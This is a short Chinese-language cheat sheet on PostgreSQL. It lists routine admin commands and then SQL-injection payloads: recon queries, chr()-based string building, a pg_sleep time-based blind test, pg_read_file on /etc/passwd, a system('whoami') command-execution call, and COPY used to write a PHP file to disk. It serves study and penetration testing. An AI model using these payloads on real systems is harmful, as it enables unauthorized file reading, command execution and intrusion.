Postgresql数据库相关知识及注入

https://www.postgresql.org/download/

psql -U post -d dbname -h host -W   	# 使用post用户登录到数据库名为：dbname,登录主机为host地址，-W表示是否输入密码  
CREATE USER testUser WITH PASSWORD '*';	# 创建用户  
GRANT ALL PRIVILEGES ON DATABASE test TO user;    				# 将数据库test授权给user,但此时用户还是没有读写权限，需要继续授权表  
GRANT ALL PRIVILEGES ON all tables in schema public TO user;  	# 授予读写权限   
ALTER ROLE pg SUPERUSER                 # 修改用户角色为超级管理员
CREATE/DROP ROLE name                   # 创建/删除 角色
\l						  				# 显示所有数据库  
\c dbname				  				# 使用某个数据库   
\du                                     # 用户列表	
\dt 					  				# 显示数据表  
\password post			  				# 为post用户添加密码  
\di						  				# 查看索引  
create\drop database dbname；  			# 创建\删除数据库     
alter table [表名A] rename to [表名B];  # 重命名数据表  
drop table [表名]; 						# 删除表   

select CURRENT_SCHEMA()           #查看当前权限
select user                       #查看用户
select current_user               #查看当前用户
select chr(97)                    #将ASCII码转为字符
select chr(97)||chr(100)||chr(109)||chr(105)||chr(110)  #将ASCII转换为字符串
SELECT session_user;
SELECT usename FROM pg_user;
SELECT getpgusername();
select version()                  #查看PostgreSQL数据库版本
SELECT current_database()         #查看当前数据库
select length('admin')            #查看长度
 
select case when(expr1) then result1 else result2 end;  #如果xx，执行result1，否则result2
例：select case when(current_user='postgres') then pg_sleep(5) else pg_sleep(0) end;
 
select pg_read_file("/etc/passwd");          #读取文件
select system("whoami");                     #执行系统命令,11.2以下才有该命令
COPY (select '<?php phpinfo();?>') to '/tmp/1.php';   #写入文件